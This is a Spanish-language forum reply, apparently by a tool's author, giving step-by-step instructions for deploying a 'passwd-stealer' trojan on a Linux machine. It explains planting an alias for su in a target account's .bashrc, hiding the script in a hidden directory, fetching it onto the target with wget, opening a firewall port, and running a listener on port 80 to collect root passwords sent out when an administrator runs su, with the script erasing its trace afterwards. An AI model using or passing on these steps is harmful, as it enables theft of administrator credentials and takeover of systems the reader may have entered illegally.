que tal.
Bueno, ante todo gracias por el kumplido :_).
Antes que nada: Por favor lee bien los sources; ya que hace un tiempo ya que
kodee esa tool. Pero bueno, a ver si te puedo aklarar algo kon lo que recuerdo.
/**** Estoy sin inet, y desde un cyber y kon poko tiempo ... ******/
Bueno, en el .bashrc de la makina objetivo en la cual deberias tener una
cuenta legalmente creada o ilegalmente creada, deberias de poner una ultima
linea parecida a esta:
alias su="source $HOME/.term/.passwd-stealer"
Esto significa que el nombre del script es "passwd-stealer" y que se encuentra
oculto en un directorio dentro del $HOME tambien oculto ".term" ...
El script "passwd-stealer" se ejecutaria automaticamente, una vez r00t o alguien
con "potestad" ( si hicieran un /bin/su no funcionariamos bien.. ) ejecutase "su"
dentro de nuestro directorio $HOME. Ahi, entraria en juego la linea introducida
por nosotros en $HOME/.bashrc; la kual haria que, en vez de /bin/su, se ejecute
nuestro troyano en $HOME/.term/.passwd-stealer ( ejecutando al segundo intento
el real /bin/su ).
Tu en tu makina, deberias de tener corriendo el programa sock_recv; que no es
mas que un socket a la escucha de conexiones en el puerto 80 para mas fiabilidad
de conexiones: ( atencion a tu router o firewall! )
server.sin_port = htons(80);
El kaso es que, si tienes un servidor http corriendo, pues kambia ese puerto en
esa linea del source por otro. Asegurate de configurar tu router o firewall de
manera que puedas recibir conexiones por dicho puerto. Imaginando que no tienes
router y utilizas iptables del modulo Netfilter komo firewall, podrias incluir una
regla en el firewall tal:
iptables -t filter -A INPUT -i eth0 -p tcp --dport 80 -s IP_DEL_OBJETIVO -j ACCEPT
/sbin/service iptables save # --> para Red Hat
Esto supone que tienes una Politica de Rechazo para todos los paketes entrantes,
y que TU konfiguras tu firewall para ver que paketes entran por tu interfaz de Red.
O sea, se supone que, por tu seguridad, has configurado tu firewall kon una
regla tal:
iptables -P INPUT DROP # o algo asi
Bueno, en la linea primera el puerto 80 refiere al puerto que hayas escogido para
las conexiones ( por defecto el 80 ).
En resumen: en un principio, debes de bajarte en la makina objetivo el .tar.gz
del link que te ofrezco ( via wget en /tmp o komo puedas
).
Descomprime las fuentes y copia/mueve el script "passwd-stealer" al directorio
deseado ( $HOME/.term/ -- kedando asi: $HOME/.term/.passwd-stealer ).
Tras ello, deberias de poner la anteriormente citada linea en el $HOME/.bashrc ..
Ahora, kreo que lo que keda es esperar a que r00t ( o alguien kon potestad ) haga
descuidadamente un "su" desde tu directorio $HOME. Es entonces kuando,
automagicamente, el escript se ejecutaria y pasaria la data ( password ) al
socket que tendrias a la escucha tu en tu makina en el puerto 80 ( o el elegido ).
Kabe rekalkar varias kosas komo: NO TE OLVIDES de darle permisos de
ejecucion al script! O sea, suponiendo que nos enkontrasemos en el directorio
$HOME/.term, y que dentro de este ya tenemos kopiado el script .passwd-stealer:
chmod 777 .passwd-stealer
o
chmod 700 .passwd-stealer # ya que sera r00t el que lo ejecute..
Otra kosa es que no debes olvidar que el script intenta borrar la ultima linea kreada
en el .bashrc despues del supuesto robo de la kontrasenia. Esto es, que si por un
casual no recibes la password y el scriptr ha sido ejecutado, deberias de reponer
esa misma linea en el $HOME/.bashrc de nuevo.
No se que mas decirte, solo desearte Suerte.
P.D1: Ante kualkier otra duda, komentamelo.
P.D2: En el directorio en TU makina en el que estes korriendo el sock_serv,
se iria kreando un archivo de texto kon los resultados.
Autor
En línea
